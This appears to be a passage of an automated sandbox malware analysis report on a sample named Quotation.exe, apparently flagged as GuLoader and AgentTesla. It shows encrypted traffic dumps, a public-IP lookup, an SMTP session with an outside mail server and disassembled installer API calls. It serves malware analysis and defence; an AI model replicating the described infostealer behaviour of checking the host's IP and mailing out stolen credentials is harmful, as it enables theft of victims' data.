2024-11-11 10:50:10 UTC	4837	IN	Data Raw: c4 b8 cd 80 71 9e 70 7a 2d 23 cb 3a 4c f8 bd a2 f5 63 98 1f 77 07 9e 5f 09 da 1f 36 21 ea 71 c7 b6 6d fc 67 61 8e 1b 2e 86 be cc 38 2b c2 73 b4 ff 7b ec 75 dc da 1e c5 37 c5 66 4f a1 2e 25 7b 58 34 19 5f 2e ac b1 c9 69 cd 2e 85 f6 12 f5 4c 49 12 d4 c4 6c ed b4 5c 59 ad d6 3e 58 e3 39 62 35 d3 99 41 b2 16 c6 c9 15 9b 07 78 ed 85 50 fb 6c 2f 3e 00 3a 86 24 fc 06 f3 bc 2a 21 ff 00 aa ed f5 14 84 10 69 12 95 bb 16 fd 71 dc fb 47 2f f6 aa 5c b5 70 e2 de 14 11 47 74 77 a9 eb 7f 3b 55 76 24 94 c4 bb e1 8a c9 39 d3 74 41 3a 04 48 4a a7 8e 62 d1 fe 09 63 e9 f4 e2 13 03 d5 a1 7b a9 bb b0 b6 e6 1a 3d 7a 95 2a b9 c1 8b 95 61 aa 82 8d d4 af 21 7e b3 20 6c 41 13 fb 6d b1 86 20 bb b3 95 6a 1d 0a 5d 53 73 f4 f9 fa d1 93 65 71 31 24 cf d4 e8 04 75 1f 1e 41 4b 5b 19 b1 e7 Data Ascii: qpz-#:Lcw_6!qmga.8+s{u7fO.%{X4_.i.LIl\Y>X9b5AxPl/>:$!iqG/\pGtw;Uv$9tA:HJbc{=za!~ lAm j]Sseq1$uAK[
2024-11-11 10:50:10 UTC	1326	IN	Data Raw: 4e 45 58 93 06 b2 f1 54 0d 3c d6 06 3f c8 a5 c6 99 3d 4f 9f 0b 6d bd 13 29 4e 69 25 01 92 05 3e 98 c2 bb f2 76 ca 62 54 ee 55 1c 35 4a fb 18 aa 5c cf 94 6e b2 2e 26 e5 c0 0e c2 a4 a7 07 b5 13 f9 ee a7 b1 3b 2c 19 12 ff 21 36 1e 40 97 1a 84 ad cc 3c 4a 6c 3e 2a 54 eb 69 1b f7 b0 4f 24 cf b9 19 cb a7 f6 e3 32 27 2e d9 35 8b 6f e4 01 2d 1f 40 64 05 7d a2 0e 7a d5 8f 46 13 34 47 02 0a 73 06 8d e0 a3 2d d2 79 99 67 84 de 54 3e dd 90 09 79 90 96 21 7a 2f e5 a3 5a 36 7e d7 8c cc 58 c0 ec 2e 18 74 68 a3 36 14 89 3f 03 36 4b ff 38 47 d1 7c 8f 25 9e 8c 8f b9 2f 84 c0 b1 86 4b ac cb 0a 2b 46 19 e9 65 c6 6c 04 a3 c5 40 42 58 c8 46 d1 43 77 7c c5 2d ed be 04 e4 03 d1 6d 50 33 17 65 2b 61 9f f5 65 bd 99 f7 1c 05 47 8e 81 25 2a 01 16 50 63 fb b4 ae f0 7f d8 80 92 14 6c Data Ascii: NEXT<?=Om)Ni%>vbTU5J\n.&;,!6@<Jl>TiO$2'.5o-@d}zF4Gs-ygT>y!z/Z6~X.th6?6K8G\|%/K+Fel@BXFCw\|-mP3e+aeG%Pcl
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: a7 00 62 a9 b9 71 77 98 72 14 37 cd bd 2e 51 73 8b 19 aa 27 7f bf ad c6 9a f8 a3 d0 bb 93 16 39 24 20 8f 50 a9 47 89 dd d0 56 97 30 4b 98 1b 77 b2 61 05 22 6f 34 83 f5 ac b4 8e 57 05 e9 49 f1 7a b1 6c 22 df a8 2b 15 d0 be a6 0d 55 19 ad dc 5c b4 55 87 2a 18 bb 2d e8 1b fd 5a ae 4a 50 9f 91 a0 2f 76 92 8b 4a 78 bf a6 6c 07 94 fd 54 2d 36 e6 05 3f 2f a5 ff 97 35 4f 9f 22 8e bf 13 29 6e 8d 2b 02 92 c3 35 95 c2 bb 0c 84 ca 61 74 dc 50 1c 35 b4 04 20 88 4a cf 94 90 40 26 26 cd 00 02 c3 ae 6b 59 b5 13 f8 30 af b1 3b 0c f4 1c fc 21 c8 ee 40 94 1a 5a a3 c0 3c 6a 96 3f 13 45 15 68 22 2b bc 4f 24 cf bd 18 cb af ca e3 32 2d f0 c7 36 8b 6f 70 55 06 5f 60 60 0f 83 ac f4 7b cc a9 46 13 34 47 05 06 73 7a 10 ec af 29 0c 61 9b 67 7a 2c 54 07 ee 92 09 79 45 64 2b 7a 07 fb Data Ascii: bqwr7.Qs'9$ PGV0Kwa"o4WIzl"+U\U*-ZJP/vJxlT-6?/5O")n+5atP5 J@&&kY0;!@Z<j?Eh"+O$2-6opU_``{F4Gsz)agz,TyEd+z
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: 23 0e 6b a9 b8 8d c0 d8 57 90 88 af dd 8a fb 1b 7a 17 ef 7a 92 aa f4 a9 84 73 47 e5 92 c8 7e d3 45 3c 05 36 e1 41 b1 fd 7d 6c 15 08 33 80 c9 a9 62 b7 c0 87 07 9c a7 bb 8f 59 9f 72 14 c9 3f b0 2d 71 7b 75 15 a9 d9 5e 83 a3 c6 9a 06 9a 99 ad 93 16 19 d3 2c 8f 50 a9 45 8b dd 90 09 64 cc b4 98 16 77 b2 61 05 2d 55 14 83 0b a0 49 87 77 05 92 2d f1 84 b4 ab 25 de a8 50 72 f0 bf a2 62 6e e7 a3 d9 7c b8 ab 8b 29 e6 95 28 e8 1b 03 a8 ac 73 75 9f 91 a0 17 8d 93 b2 40 40 49 58 93 d8 bf fd 54 2d db d8 05 3f 36 5a f3 94 3d 6f 93 33 ae bf ed 28 57 76 25 01 92 c3 35 94 c2 bb 34 a4 3b 9d 8b 82 19 1c 35 be 04 28 b0 5c 31 9d 92 be d4 2f ce fe 26 f1 ae 2b 45 9f 13 e3 20 ac b1 2b 0d 0a 12 f4 21 c8 01 6c 97 1a 7a a1 3e 32 69 68 06 59 54 15 68 22 2b bc 4c 24 11 b1 19 cb 8f 37 Data Ascii: #kWzzsG~E<6A}l3bYr?-q{u^,PEdwa-UIw-%Prbn\|)(su@@IXT-?6Z=o3(Wv%54;5(\1/&+E +!lz>2ihYTh"+L$7
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: 3a 33 46 de 62 de 61 d7 af b4 d8 db f6 5a 46 d7 70 ec 5f 18 36 6b 50 62 86 96 18 e9 8a dc 3b 18 d0 6d 46 db 3e a9 4b eb 8c b7 51 83 96 e6 76 90 a5 c5 e0 dd 1d 7c a9 b8 96 0e d3 56 70 a8 af dd 86 fb 24 c5 37 ef 7a b2 a8 0a a7 86 8d 71 67 92 c8 80 df b8 30 27 32 c1 40 b1 03 7c ab 1a 31 2f 80 f1 26 9c be c0 a7 79 e8 a7 bb 75 7f c0 72 14 3d 09 1e 2d 51 73 55 17 a9 27 5f 44 a3 c4 9a 06 5c e5 af 93 36 3b da 2c 8f ae 56 72 9a dd 90 f7 48 cf b4 b8 1d 89 bc 61 fb 0c 6f 34 83 0b 5e b9 8c 77 05 17 45 f3 84 90 55 28 df a8 d5 14 c9 b5 a6 0d 55 e7 83 de 5c b4 ab 75 27 1a 9b 2b 16 17 ff a4 8f 70 55 9f 91 5e 16 4a 97 8b 4a 40 71 5d 93 f8 be c5 2e d2 da 29 f8 36 36 a4 84 e2 3d 4f 9b 16 50 b1 12 29 90 7e 25 01 ba a6 30 94 c8 45 05 7a c6 19 00 fc 55 18 1d b2 fa 21 b7 a2 c6 Data Ascii: :3FbaZFp_6kPb;mF>KQv\|Vp$7zqg0'2@\|1/&yur=-QsU'_D\6;,VrHao4^wEU(U\u'+pU^JJ@q].)66=OP)~%0EzU!
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: f3 39 bb 38 af b0 b9 d0 50 20 b8 7f 08 01 02 9c a3 d2 f5 d1 6e 91 c9 31 50 76 7f 02 ad e0 ee b5 5b 6d f6 dd 01 34 6c b6 84 03 4b 56 2f a8 9d 2d 9a 11 51 16 31 46 fe 62 20 60 ee 43 b5 e1 d1 08 53 46 d7 78 a0 5f 18 30 b5 5d 62 86 96 18 eb 8a dc 1b e2 dc 6d 46 05 36 90 4e eb 72 b6 50 a5 96 e6 76 56 fe 3a 1f 0a 72 7c a9 be 73 37 d0 56 b0 db af dd 8a 05 25 8b 2e e2 78 b2 a8 d4 a3 84 8d 49 18 9c c8 80 df b8 30 25 32 c1 56 b1 03 7c ab 1a 31 39 80 f1 26 48 97 d8 a7 02 9c 59 b5 71 57 9c 8c 18 37 33 93 67 51 73 75 eb a8 1e 55 ba ad c6 b0 26 e9 e9 ad 93 e8 37 da 2c 8f ae 5b 4b 88 fd f1 f7 68 cf 4a b9 24 55 b2 61 fb d2 65 34 83 2e db c3 8e 77 01 9b c5 f5 84 c0 7d 33 df a8 21 68 84 bf a6 09 75 85 a3 df 5c 4a a5 8b 29 18 65 27 e8 1b dd 96 af 73 55 61 90 99 1d 73 92 8b Data Ascii: 98P n1Pv[m4lKV/-Q1Fb `CSFx_0]bmF6NrPvV:r\|s7V%.xI0%2V\|19&HYqW73gQsuU&7,[KhJ$Uae4.w}3!hu\J)e'sUas
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: de bf 16 4d 1f 1a bf b9 57 19 de fe c2 61 38 28 c7 18 f9 3c 25 d0 ab b3 62 34 7a 2b 2c e4 30 d4 14 7d a4 a6 eb 13 9b c8 99 73 ad 02 b2 db 46 f1 7c 87 19 d3 7d 9b 2c af 4e b8 17 7c 20 b8 7f 08 04 02 9c a6 95 81 d1 6e 6b ba 8a 43 76 0f 2a 48 e9 ef bf 06 69 f6 dd 05 54 46 4b 7b fc 95 65 2f a8 9d 2d 98 11 51 36 cd 4a fe 62 fe 69 d7 51 b5 1f d0 cf 50 46 d7 50 c7 7f 11 36 95 5e 9c 88 96 e6 e5 74 d0 1b 1c f0 54 46 25 3f 6e 4f d2 9b b7 69 86 68 ef 77 a8 d7 37 1f 22 37 3c 06 47 72 c1 f1 6c 90 a8 af 23 84 fb 24 d4 e9 e3 7a b2 88 d1 a9 84 8d b7 e7 ab ea 80 df 46 c2 2c 32 e1 64 ca 77 7c 55 1f 7a ed 84 f1 56 4a ac c0 a7 08 e1 d3 bb 71 53 bc 54 14 37 33 4d 23 51 73 75 eb a5 27 5f 9a 86 c6 9a 06 5c e8 94 b1 16 39 da d2 86 50 57 6e f3 a9 90 f7 6c bd 5e bc 1d 07 9a 7a fb Data Ascii: MWa8(<%b4z+,0}sF\|},N\| nkCv*HiTFK{e/-Q6JbiQPFP6^tTF%?nOihw7"7<Grl#$zF,2dw\|UzVJqST73M#Qsu'_\9PWnl^z
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: a3 a1 b0 c6 be 29 2b 7a 9f 5d bf 86 8b 91 31 ba 95 8d d4 5b 52 51 b2 20 96 b3 1f f9 4d c8 d5 20 bb 3d e9 63 16 0a 59 ad 55 d6 f5 04 d8 93 9b 10 29 24 cf 20 99 36 74 3f 48 bf 47 59 e7 df c7 1e 6d 38 28 19 02 f9 3c 00 55 de 8a 40 30 08 a1 d7 ed 40 fc 2a 06 d0 ac 96 63 e9 1a 99 53 8e 2a a9 db b8 f5 01 f3 19 2d 75 bb 38 8f 44 b8 e9 72 de b9 46 d4 08 02 9c 78 a0 81 d1 4b ee cf b3 54 72 7d be b3 e0 9e 97 3d 19 f6 d7 78 60 2d b6 80 23 be 58 2f a8 63 dd 96 11 51 c8 3f 46 fe 42 d3 61 d7 51 4b e0 e8 d4 5a 46 d7 ae e4 5f 18 13 ee 2a 62 86 92 94 43 8f dc 6b 34 cb 6d 46 2f 42 e4 4e eb 88 97 67 86 96 e6 88 a6 f7 3a 1f dc 3b 7c a9 98 8e 3e d1 56 6e a9 96 ca 8a fb 24 2a 1e ee 7a 92 a0 f4 a9 84 cd 85 11 6d 37 a0 db 46 3c 25 cc ef 41 b1 03 82 59 1b 08 13 c8 f1 26 62 49 c1 Data Ascii: )+z]1[RQ M =cYU)$ 6t?HGYm8(<U@0@cS-u8DrFxKTr}=x`-#X/cQ?FBaQKZF_bCk4mF/BNg:;\|>Vn$zm7F<%AY&bI
2024-11-11 10:50:10 UTC	1378	IN	Data Raw: fb ca 20 f4 aa 7f 30 0a e0 de ee 6f 61 72 05 de c3 64 4b 28 4d 58 e0 c0 45 e9 a8 af 11 db 74 bf 32 76 53 4a 59 f2 4a c4 de 64 69 17 fa 1f 12 c4 d2 a2 7b db 8e 90 d8 96 32 2b 84 9b 20 cb 86 75 99 11 82 b5 dc d4 a5 5c af b3 19 7f bf 1f f9 93 ca d4 20 9b b4 e8 5a 1c 4a 87 5c 80 09 d9 56 d8 93 65 e0 27 24 cf de 6b 3a 74 1f 3a 8b 47 59 19 20 ff 05 4f 38 28 e7 f5 f0 3c 25 0b d1 fe 40 34 7e 59 e0 eb 30 a4 19 1d d0 a6 e1 6a 9d 1a 9d 77 fd 1f a9 db 46 05 0f f3 19 d3 87 b7 38 af 6e e1 e9 72 20 46 7e cf 02 02 9c 86 83 a1 8b 6e 95 bb 4d 5a 76 0f 2a 48 ec ee bf 06 3a f6 dd 05 ea 2c 8f 8e 03 b5 58 05 88 b9 d3 96 11 af 38 33 46 fe 9c d2 61 d7 71 ad e1 d1 f6 a4 47 ee 47 ed 5f 18 c8 9c 5f 62 a6 b0 e6 e5 8a 9c 2c eb 2f 92 66 3c 3f 90 4e 15 82 b7 69 86 68 ea 76 a8 d7 4b 1f Data Ascii: 0oardK(MXEt2vSJYJdi{2+ u\ ZJ\Ve'$k:t:GY O8(<%@4~Y0jwF8nr F~nMZv*H:,X83FaqGG__b,/f<?NihvK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49908	172.67.74.152	443	4068	C:\Users\user\Desktop\Quotation.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 10:50:11 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-11 10:50:11 UTC	399	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 10:50:11 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8e0db84fee27c434-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=769&delivery_rate=2635122&cwnd=250&unsent_bytes=0&cid=b7f88e346fde0d52&ts=112&x=0"
2024-11-11 10:50:11 UTC	13	IN	Data Raw: 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 Data Ascii: 66.23.206.109

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 11, 2024 11:50:14.159353018 CET	587	49929	67.23.226.139	192.168.2.9	220-super.nseasy.com ESMTP Exim 4.96.2 #2 Mon, 11 Nov 2024 05:50:14 -0500 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 11, 2024 11:50:14.159611940 CET	49929	587	192.168.2.9	67.23.226.139	EHLO 226533
Nov 11, 2024 11:50:14.284239054 CET	587	49929	67.23.226.139	192.168.2.9	250-super.nseasy.com Hello 226533 [66.23.206.109] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Nov 11, 2024 11:50:14.284497976 CET	49929	587	192.168.2.9	67.23.226.139	STARTTLS
Nov 11, 2024 11:50:14.411748886 CET	587	49929	67.23.226.139	192.168.2.9	220 TLS go ahead

Target ID:	0
Start time:	05:48:32
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x400000
File size:	1'196'832 bytes
MD5 hash:	5BDCC2D33CA974C1D8448AFCF83F74D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2334492638.000000000A0C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:49:52
Start date:	11/11/2024
Path:	C:\Users\user\Desktop\Quotation.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quotation.exe"
Imagebase:	0x400000
File size:	1'196'832 bytes
MD5 hash:	5BDCC2D33CA974C1D8448AFCF83F74D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2801542235.00000000383DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2801542235.00000000383B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	30.2%
Dynamic/Decrypted Code Coverage:	25.9%
Signature Coverage:	16.5%
Total number of Nodes:	826
Total number of Limit Nodes:	19

Executed Functions

Function 004036DA Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F
GetVersionExW.KERNEL32(?), ref: 00403732
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
OleInitialize.OLE32(00000000), ref: 0040381B
SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
CharNextW.USER32(00000000,007B3000,?,007B3000,00000000), ref: 0040389B
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
DeleteFileW.KERNELBASE(1033), ref: 00403A05

Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quotation.exe,00000400), ref: 004033FA

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AA8
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ABB
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403ACA
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,00000000), ref: 00403AD9
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
CopyFileW.KERNEL32(C:\Users\user\Desktop\Quotation.exe,0079F200,00000001), ref: 00403B66
CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F

Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E

OleUninitialize.OLE32(00000000), ref: 00403BCD
ExitProcess.KERNEL32 ref: 00403BE4
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E

Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,007B3000,?,007B3000,00000000), ref: 004065EA

Strings

NSIS Error, xrefs: 00403840
Low, xrefs: 004039CC
Error launching installer, xrefs: 00403A4D
.tmp, xrefs: 00403AC0
TEMP, xrefs: 004039DE
\Temp, xrefs: 004039B0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040398E, 00403993, 004039A9, 004039B5, 004039C4, 004039D1, 004039DD, 004039E5, 00403AA1, 00403AB6, 00403AC5, 00403AD4, 00403AE7, 00403AFC, 00403BB4
1033, xrefs: 00403A00
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
TMP, xrefs: 004039E6
C:\Users\user\overlays\besvangredes\Konditorierne, xrefs: 00403A78
C:\Users\user\Desktop\Quotation.exe, xrefs: 00403B61
~nsu, xrefs: 00403A9C
SeShutdownPrivilege, xrefs: 00403C10
C:\Users\user\Desktop, xrefs: 00403ACF, 00403B10

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Quotation.exe$C:\Users\user\overlays\besvangredes\Konditorierne$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 1152188737-1818686645
Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E

Function 004066F7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 155
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B

DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
lstrlenW.KERNEL32(?), ref: 00406799
FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
FindClose.KERNEL32(00000000), ref: 00406853

Strings

\*.*, xrefs: 0040676B

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
String ID: \*.*
API String ID: 2636146433-1173974218
Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF

Function 004065AD Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
FindClose.KERNEL32(00000000), ref: 004065C4

Memory Dump Source

Source File: 00000000.00000002.2332964173.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2332946824.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333054569.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333072139.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2333510702.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
